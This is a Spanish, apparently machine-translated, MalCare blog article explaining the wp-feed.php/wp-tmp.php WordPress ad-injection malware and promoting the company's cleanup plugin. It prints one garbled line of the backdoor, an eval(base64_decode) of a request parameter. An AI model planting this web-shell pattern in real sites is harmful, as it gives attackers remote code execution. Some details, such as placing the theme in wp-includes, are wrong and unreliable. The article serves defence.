Repare el malware Wp-Feed.php y Wp-Tmp.php en WordPress - MalCare

Publicado: 2023-04-19

¿Su escáner de malware le está alertando que "su sitio ha sido pirateado" pero le parece bien?

¿Los visitantes se quejan de los anuncios de spam en su sitio web de WordPress pero no ve ninguno?

Existe una buena posibilidad de que su sitio sea pirateado.

Los piratas informáticos encuentran formas inteligentes de ocultar sus ataques a los propietarios de los sitios para que no sean detectados y puedan seguir explotando el sitio web durante mucho tiempo.

El wp-feed.php es uno de los trucos mejor disfrazados que existen.

Oculto para los propietarios del sitio, muestra anuncios de productos ilegales, drogas y contenido para adultos a sus visitantes.

Incluso si pudiera detectarlo, encontrar todos los lugares a los que se ha propagado la infección no solo es difícil sino, a veces, imposible. La eliminación de la infección es complicada y dura. Si logras eliminarlo, en 8 de cada 10 casos, la infección reaparece.

En pocas palabras: es difícil eliminar una infección wp-feed.php de un sitio web de WordPress.

Afortunadamente, nos hemos ocupado de este malware innumerables veces antes. Durante la última década, no solo eliminamos con éxito wp-feed de cientos y miles de sitios web de WordPress, sino que también evitamos reinfecciones.

No te preocupes. Estás en buenas manos.

En este artículo, aprenderá:

  • Cómo funciona el malware wp-feed.php y cómo afecta a su sitio web
  • Cómo eliminarlo de tu sitio
  • Cómo prevenir reinfecciones en el futuro

TL;DR : para eliminar la infección wp-feed.php, todo lo que necesita hacer es instalar nuestra eliminación de malware de WordPress y ejecutar la función de limpieza automática. El complemento también ayuda a prevenir la reinfección al eliminar las puertas traseras del sitio web que permiten la reinfección y bloquea el tráfico malicioso para que no acceda a su sitio con un firewall y protección de inicio de sesión.

¿Qué es wp-feed.php y wp-tmp.php? (Causas, síntomas y reinfecciones)

En pocas palabras: WP-Feed es un tipo de malware que muestra anuncios maliciosos en sitios web. El objetivo es lograr que sus visitantes hagan clic en los anuncios y los redirija a un sitio web malicioso.

Debes estar preguntándote -

> ¿Cómo se infectó mi sitio web?

La infección generalmente es causada por el uso de complementos o temas anulados .

El software anulado es tentador de usar porque le ofrece funciones premium sin costo. Muchos creen que el software anulado se distribuye como un acto de benevolencia.

Por lo general, eso está lejos de ser el caso. El software anulado se distribuye para que los piratas informáticos puedan acceder a su sitio sin esfuerzo.

Los complementos o temas anulados están repletos de malware. Cuando instala un tema o complemento anulado en su sitio web, básicamente está abriendo puertas para que los piratas informáticos accedan a su sitio.

Además del software anulado, los complementos y temas obsoletos también pueden ser vulnerables. Los piratas informáticos aprovechan estas vulnerabilidades para acceder a su sitio.

También explotan nombres de usuario y contraseñas débiles como "admin" y "p@ssword". Las credenciales débiles son fáciles de adivinar.

Un pirata informático puede adivinar su nombre de usuario e inicio de sesión e implantar el malware wp-feed.php directamente en su sitio web.

> ¿Por qué los piratas informáticos infectan sitios con wp-feed.php?

El objetivo es robar a sus visitantes y engañarlos para que compren servicios o productos falsos para que los piratas informáticos puedan generar ingresos.

Lo que es realmente sorprendente es cómo a menudo pueden lograr esto sin que el propietario del sitio obtenga una sola pista.

Lo que nos lleva a la pregunta:

> ¿Por qué es difícil notar los síntomas de esta infección?

Una vez que los piratas informáticos obtienen acceso a su sitio web, implantan dos archivos (wp-feed.php y wp-tmp.php) en su carpeta wp-includes.

La carpeta wp-includes es parte de su núcleo de WordPress. Es donde se encuentra el tema de su sitio web.

El archivo de fuente de WP comienza a infectar otros archivos de WordPress, especialmente function.php, que es parte de su tema activo.

función.php archivozilla

Desde function.php, los piratas informáticos pueden mostrar anuncios emergentes maliciosos en su sitio web de WordPress.

Sin embargo, la parte realmente diabólica es que los anuncios solo se muestran a los visitantes nuevos , no a los visitantes repetidos. El malware registra a los visitantes de su sitio para garantizar que solo se muestren los anuncios a los visitantes nuevos. Esta es una forma ingeniosa de evitar la detección.

software malicioso wp-feed

Por lo tanto, usted, como visitante frecuente de su propio sitio, nunca notará ningún síntoma de pirateo.

¿Cómo limpiar el malware wp-feed.php?

Hay dos formas de eliminar la infección. Esos son -

1. Usar un complemento (fácil)

2. Hacerlo manualmente (difícil)

Vamos a sumergirnos en cada método.

1. Eliminar el malware WP-Feed.php con un complemento (manera fácil)

Es posible que algunos de ustedes ya tengan un complemento de seguridad instalado en su sitio web. Probablemente fue este complemento el que lo alertó sobre los archivos maliciosos: wp-includes/wp-feed.php y wp-includes/wp-tmp.php .

La mayoría de los complementos de seguridad ofrecen servicios de eliminación de malware, pero muy pocos pueden hacerlo de manera rápida y efectiva como MalCare Security.

  • MalCare limpiará su sitio en menos de 60 segundos . No tienes que levantar un boleto. No tienes que esperar en una cola. No tiene que entregar las credenciales de su sitio a un complemento de terceros.
  • No solo eso, el complemento va más allá en cada rincón y grieta, en busca de malware oculto. Encuentra todos los scripts maliciosos presentes en su sitio.
  • Utiliza métodos no tradicionales para detectar malware nuevo y bien escondido . Analiza minuciosamente el comportamiento del código para identificar intenciones maliciosas. Esto también ayuda a garantizar que no marque el código bueno como malo .
  • Hace todo eso en el lapso de unos pocos minutos .

Limpiemos la infección wp-feed.php con MalCare.

Paso 1: Instale y active MalCare Security en su sitio web de WordPress.

Paso 2: Desde el menú de su tablero, seleccione MalCare. Ingrese su dirección de correo electrónico y haga clic en Sitio seguro ahora .

malcare sitio seguro ahora

Paso 3: en la página siguiente, se le pedirá que ingrese una contraseña y luego que ingrese su URL .

MalCare comenzará a escanear su sitio web inmediatamente. El propósito es encontrar cada instancia de código malicioso presente en su sitio web.

Esto significa que no solo detectará los archivos wp-feed.php y wp-tmp.php, sino todo el código malicioso que infecta tus archivos de WordPress, incluidas las instancias que se esconden en el archivo function.php.

Puede estar seguro de que el complemento también encontrará todas las puertas traseras presentes en su sitio, para evitar reinfecciones.

agregar sitio

Al encontrar los scripts maliciosos, el complemento lo alertará al respecto.

A continuación, debe limpiar su sitio.

seguridad

Tenga en cuenta que la eliminación de malware de MalCare es una característica premium. Es el único complemento de eliminación instantánea de malware que existe. Por $ 99 al año, puede limpiar un solo sitio tantas veces como desee y estar seguro de la mejor protección posible. Obtenga más información sobre los precios de MalCare .

Paso 4: para eliminar todos los rastros de wp-feed.php de su sitio web, todo lo que necesita hacer es hacer clic en el botón Auto-Clean .

MalCare comenzará a limpiar su sitio al instante.

malcare limpieza automática

Eso es todo, amigos. Así es como limpias tu sitio web con un complemento.

2. Eliminar manualmente el malware WP-Feed.php (manera difícil)

La eliminación manual de la infección es bastante desafiante porque, en este tipo de infección, hay muchas piezas en movimiento.

  • El hacker carga dos archivos maliciosos: wp-feed.php y wp-tmp.php. Necesitas eliminarlos para comenzar. Esta es probablemente la única parte fácil.
  • La infección se propaga a otros archivos de WordPress, incluido el archivo function.php. Esto es difícil, porque quién puede decir dónde se ha propagado la infección.
    • Te llevará horas encontrar todo el código malicioso.
    • Reconocer el código malicioso es difícil porque están bien disfrazados y parecen fragmentos de código normales.
    • Algunos códigos maliciosos conocidos, como "eval(base64_decode)", pueden formar parte de complementos legítimos. No se utilizan de forma maliciosa. Por lo tanto, eliminar el código afectará su complemento e incluso puede dañar su sitio.
    • Existe una posibilidad bastante alta de que se le escapen fragmentos de código que pueden conducir a reinfecciones.

La eliminación manual, por lo tanto, no es nada efectiva.

Sin embargo, si aún desea hacerlo, realice una copia de seguridad completa de su sitio web. Si termina eliminando algo accidentalmente y rompiendo su sitio, puede restaurarlo rápidamente a la normalidad.

Aquí hay una lista de los mejores servicios de copia de seguridad por los que puede optar.

Y aquí hay un artículo que lo ayudará a eliminar el malware manualmente: WordPress pirateado. Simplemente vaya a la sección "Cómo limpiar manualmente un sitio web de WordPress pirateado" .

Su sitio web está libre de infecciones ahora, pero está lejos de ser seguro. Los piratas informáticos aún pueden apuntar a su sitio e intentar infectarlo. Debe asegurarse de que su sitio esté protegido contra futuras infecciones. Pero antes de entrar en eso, echemos un vistazo al impacto de la infección wp-feed.php & wp-tmp.php.

Impacto de la infección de malware wp-temp.php

No hace falta decir que la presencia de malware wp-feed.php y wp-tmp.php puede tener un impacto devastador en su sitio web.

Los sitios web que han sido infectados con wp-temp.php a menudo sufrirán las siguientes consecuencias:

  • Notará un aumento en la tasa de rebote y una disminución en el tiempo que los visitantes pasan en su sitio web.
  • Los anuncios emergentes harán que su sitio web sea pesado y realmente lento .
  • A nadie le gusta un sitio web lento, por lo que es probable que los visitantes presionen el botón Atrás antes de que las páginas se carguen en el navegador. Esto tendrá un efecto dominó.
  • Los motores de búsqueda notarán la rapidez con la que las personas abandonan su sitio. Llegarán a la conclusión de que no estás ofreciendo lo que buscan los usuarios. Su clasificación en los motores de búsqueda caerá .
  • Esto significa que se desperdicia todo el esfuerzo, el tiempo y el dinero que podría haber gastado para clasificarse más alto en las SERP.

lista negra de google

  • Los sitios web pirateados están en la lista negra de Google y los proveedores de alojamiento los suspenden . Además, si los sitios pirateados ejecutan anuncios de Google, se suspenderá la cuenta de AdWords. Todo esto conducirá a una mayor inmersión en el tráfico.
  • Además, los sitios web pirateados deben limpiarse, lo que puede ser un asunto costoso, si no está utilizando las herramientas adecuadas.

La buena noticia es que sabe que su sitio está pirateado. Por lo tanto puedes limpiarlo y detener el impacto.

¿Cómo proteger su sitio del malware wp-feed.php en el futuro?

Muchos de nuestros lectores pueden haber intentado eliminar el malware wp-feed.php de sus sitios, solo para descubrir que el malware sigue regresando.

Esto sucede porque hay una puerta trasera instalada en su sitio. La mayoría de las puertas traseras están extremadamente bien disfrazadas, tanto que los desarrolladores aficionados pueden pasarlas por alto como código legítimo.

En una sección anterior, explicamos que los piratas informáticos insertan dos archivos, wp-feed.php y wp-tmp.php, en el código de su sitio web. El archivo wp-tmp.php actúa como una puerta trasera. Si abre el archivo, encontrará un script que se parece a esto:

 $p = $SOLICITUD$#91;”m”]; eval(base64_decode ($p));

La buena noticia es que puede proteger su sitio de futuros intentos de pirateo tomando las siguientes medidas:

1. Elimine el software anulado y deje de usarlo

Si está utilizando un complemento o tema anulado en su sitio web, elimínelo inmediatamente .

Los piratas informáticos obtuvieron acceso a su sitio utilizando software anulado en primer lugar. No importa qué tan bien limpie su sitio, si no elimina el software anulado, los piratas informáticos encontrarán su camino en su sitio e implantarán malware.

Si ha dado permiso a sus usuarios para instalar complementos y temas, asegúrese de que nunca usen software anulado.

De hecho, es mejor practicar para evitar la instalación de complementos y temas por completo con la ayuda de MalCare.

Todo lo que necesita hacer es iniciar sesión en el panel de control de MalCare, seleccionar su sitio web, hacer clic en Aplicar endurecimiento y habilitar Bloquear instalación de complemento/tema .

bloquear la instalación de plugins o temas

2. Fortalezca la seguridad de su sitio

Puede evitar que los piratas informáticos implanten archivos maliciosos como wp-feed.php en sus carpetas de WordPress cambiando los permisos de archivo .

Los permisos de archivos son un conjunto de reglas que determinan quién puede acceder a qué archivos. Puede impedir que los usuarios realicen modificaciones en la carpeta wp-includes. Para comprender los permisos de archivos con mayor profundidad, consulte esta guía: Permisos de archivos de WordPress.

cambiar el administrador de archivos de permisos

También puede impedir que los piratas informáticos modifiquen su tema desactivando el editor de archivos . Esto evitará que inyecten anuncios emergentes en su sitio web. Puede hacerlo manualmente, pero es arriesgado y no se recomienda.

Si ya tiene MalCare instalado en su sitio, todo lo que necesita hacer es hacer clic en un botón para desactivar el editor de archivos.

deshabilitar el editor de archivos

Obtenga más información sobre el endurecimiento de WordPress.

3. Mantenga su sitio web actualizado

Al igual que cualquier otro software, los complementos y temas de WordPress desarrollan vulnerabilidades. Cuando los desarrolladores se enteran de esta vulnerabilidad, rápidamente crean un parche y lo lanzan en forma de actualización.

Si hay algún retraso en la implementación de las actualizaciones, pone en riesgo su sitio.

Los piratas informáticos son buenos para explotar vulnerabilidades . De hecho, siempre están buscando sitios web con vulnerabilidades para poder usarlos para obtener acceso al sitio e infectarlo con malware.

Por lo tanto, nunca demore las actualizaciones.

Puede obtener más información sobre las actualizaciones de seguridad aquí: Actualizaciones de seguridad de WordPress.

Aquí hay una guía que lo ayudará a mantener su sitio actualizado: Cómo actualizar WordPress.

4. Hacer cumplir el uso de credenciales sólidas

La forma más fácil de acceder a su sitio web es a través de su página de inicio de sesión.

El hacker solo necesita adivinar con éxito sus credenciales de usuario. De hecho, diseñan bots que pueden probar cientos de combinaciones de nombres de usuario y contraseñas en el lapso de unos pocos minutos. Si usted o alguno de sus compañeros de equipo está utilizando credenciales fáciles de adivinar como "admin" y "password123", los bots tardarán 2 segundos en violar su sitio. Esto se llama un ataque de fuerza bruta.

Es importante asegurarse de que cada usuario de su sitio web use nombres de usuario únicos y contraseñas seguras.

Incluso puede ir más allá e implementar varias medidas para proteger su página de inicio de sesión. Hemos compilado una lista de medidas de seguridad de inicio de sesión de WordPress que puede tomar.

5. Usa un cortafuegos

¿No sería genial si pudiera evitar que los piratas informáticos accedieran a su sitio web en primer lugar?

Un firewall es justo la herramienta que necesita.

Investiga el tráfico que quiere acceder a tu sitio. Si detecta que el tráfico se origina en una dirección IP maliciosa, el cortafuegos bloquea el tráfico de inmediato.

De esta forma, filtra hackers y bots.

Aquí hay una lista de los mejores cortafuegos de WordPress que puede activar en su sitio.

Sin embargo, si está utilizando MalCare, entonces ya tiene un firewall activado en su sitio.

cortafuegos mal cuidado

¿Qué sigue?

Le hemos mostrado cómo limpiar su sitio y cómo asegurarse de que nunca más lo pirateen.

Un consejo que creemos que salvará a su sitio web de una serie de desastres es: realice copias de seguridad periódicas de su sitio web.

Ya sea que su sitio web arroje un error repentinamente o esté roto, una copia de seguridad lo ayudará a reparar rápidamente su sitio temporalmente.

Si se suscribe a MalCare Security, también puede aprovechar un complemento de copia de seguridad por un cargo adicional. Póngase en contacto con nosotros para obtener más información.

¡ Déle una vuelta al complemento de seguridad de MalCare !